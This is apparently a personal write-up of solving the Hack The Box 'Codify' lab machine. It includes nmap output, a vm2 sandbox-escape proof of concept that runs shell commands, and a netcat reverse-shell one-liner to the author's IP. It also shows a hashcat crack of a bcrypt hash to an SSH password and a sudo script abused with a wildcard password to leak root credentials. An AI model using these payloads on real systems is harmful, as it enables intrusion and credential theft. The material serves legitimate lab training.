hello hacker just wanted to share with you a simple walkthrough from hack the box seasonal III active machine.
## Description
```
OS:LINUX
MACHINE_NAME:CODIFY
REALED_DATE: 4/11/2023
PWN_DATE: 5/11/2023
RATE:EASY
AUTHORY:kavigihan
```
codify is simple easy machine from HTB seasonal III which is found running a node.js editor which is made of vm2 and which is vulnerable to remote code execution.
Here is how i solved the box.
### SCANNING
```
# Nmap 7.94SVN scan initiated Tue Apr 2 13:30:01 2024 as: nmap -sC -sV -oN nmap_scan.txt -vvv -p 53,22,80 10.10.11.239
Nmap scan report for 10.10.11.239
Host is up, received syn-ack (0.20s latency).
Scanned at 2024-04-02 13:30:02 EDT for 29s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
| 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
53/tcp open domain syn-ack (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http syn-ack Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://codify.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94SVN%I=7%D=4/2%Time=660C40A5%P=x86_64-pc-linux-gnu%r(DN
SF:SVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x82\0\x01\0\0\0\0\0\0\x07versio
SF:n\x04bind\0\0\x10\0\x03");
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 2 13:30:31 2024 -- 1 IP address (1 host up) scanned in 30.02 seconds
```
nmap reviel two sensitive port (port 22 and 80).From
### ENUMERATION
From nmap we can see that we have 2 ports open where by port 22 we don't have credentials to login with, but port 80 is a web service running but also we can see we that it has domain.
domain: codify.htb (i added it to /etc/hosts)
From here we can see that it is running a node.js if you click (Try it now) I found a node.js text editor since we didn't have much information about the node.js we can decided to check other functionalities.
It seems child_process is restricted but also fs that one was awersome. Check this one out if child_process & fs was maybe enabled it was a very very easy to get a rce from the text editor.
Upon moving found this interested text on the **About Us** page.
vm2(virtual machine 2) is a library that provides a secure and sandboxed environment for executing JavaScript code, primarily used in server-side environments such as Node. js.
if you view the source code you will find the it is v3.9.16
From here I have already know with what am dealing so far my another step was to google for CVE if is available
And i found this PoC how to exploit it [PoC](https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244)
### EXPLOITATION
```
## PoC
const {VM} = require("vm2");
const vm = new VM();
const code = `
err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd');
}
`
console.log(vm.run(code));
```
## getting a reverse shell as **svc**
time for a reverse shell just replace the IP with yours and your fav port number and remember to start a listener on your terminal
```
payload: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 1234 >/tmp/f
```
And i got a shell on my terminal
### FOOTHOLDING
Since I got a reverse shell I stibilized it like a pro and moved on to my next phase
From here now we have many options such uploading linpeas or pspy64 and let them help us do some more analysis with our target. But i just go straight.
We can now try to check the number of user with shells so that we can know what were dealing with inside this server
users with shells are
```
svc:x:1001:1001:,,,:/home/svc:/bin/bash
joshua:x:1000:1000:,,,:/home/joshua:/bin/bash
root:x:0:0:root:/root:/bin/bash
```
NOTE: all this information we can also get from linpeas it good in finding users details and common bugs.
Normally my next stop was to try to check in the /var/www directory and see if I can find any juice information.
As we see in the contacts we find a tickets.db file which inside it we can see some username and password hash
```
username:joshua
password:$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
```
## cracking the joshua hash
The hash type is browfish and its mode is 3200 so we can use hashcat or john to do this simple as that, i have already cracked the hash
```
┌──(alienx㉿alienX)-[~/Desktop/MACHINES/CODIFY]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt --show
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2:spongebob1
```
## ssh credentials
username:joshua
password:spongebob1
Time now to login to the server as user joshua with our creds
### PRIVILEGE ESCALATION
With privilege escalation, first of all i usually try to check for the vulnerable kernels but to be frankly open only this technique of me only works for 80% tryhackme and PwnTillDown machines(thats y i slowdown even doing them coz it even works for insane and hard machines,many of them are vulnelable to kernel so i usually find my self easy to root dispite is no the right way to do the machine)
Oky this machine was not even vulnerable to kernel exploit.
## checking sudo -l
Since my first approach didn't work i moved on with "**sudo -l**" and will work as long as you have password for joshua
Now we can see that user joshua may run mysql-backup.sh script as root
```
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
```
We can do more analysis about script lets give it a visit from its location a little bit and see what it has fun there.
```
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
```
In order to get root access we have to understand the script first
## About the script
Its a bash script writen in bash, it begin by initilizing the **DB_USER** as '**root**',after that the script then initilize the DB_PASS with a location which is located in root directory, but also the script set the path where the mysql BACKUP should be created.
After that the script then prompt the user the password and then compare it with the one present in the /root/.creds when password matches it display "Password confirmed!" and proceed to the next phase where it tried to create mysql backup and then unzip it and send it to the "BACKUP_DIR/db.sql.gz" as a ziped file.
That was a litle simple overview of the script but the script does a bunch of stuffs so on your own time just give. forexample with the scipt it is possible to list the databases with an invalid DB_PASS os take your time and read the script well.
## How to exploit the script
From the script when it reads the user pass it doesn't provide any filtering and with linux is that it possible to execute something else that provides the same properties.
Now create another session with user joshua and from the first session upload pspy64 binary
N/B: pspy64 is good in analysing what is going on with every interesting process on the computer
While pspy64 was running on the second session i decided to try running the script with sudo
```
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root: *
```
I tried with password as **'*'** and Boom i got juice info
From the second session If we take a close look we will find something like this
```
2024/04/02 21:39:06 CMD: UID=0 PID=51706 | /usr/bin/mysql -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 -e SHOW DATABASES;
2024/04/02 21:39:06 CMD: UID=0 PID=51705 | /bin/bash /opt/scripts/mysql-backup.sh
2024/04/02 21:39:06 CMD: UID=0 PID=51709 |
2024/04/02 21:39:06 CMD: UID=0 PID=51710 | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql
```
Now from here we can see that it is trying to run **mysql** with user '**root**' and password as '**kljh12k3jhaskjh12kjh3**', since the backup was successful created means that password was this one which was required.
The machine was really interesting and what I love from HTB is that i usually learn something new every pentesting I do, We are almost done with SEASONAL IV (savage land) current its fun and tough here this seasonal with windows machines
Sign in with Wallet
Connect another wallet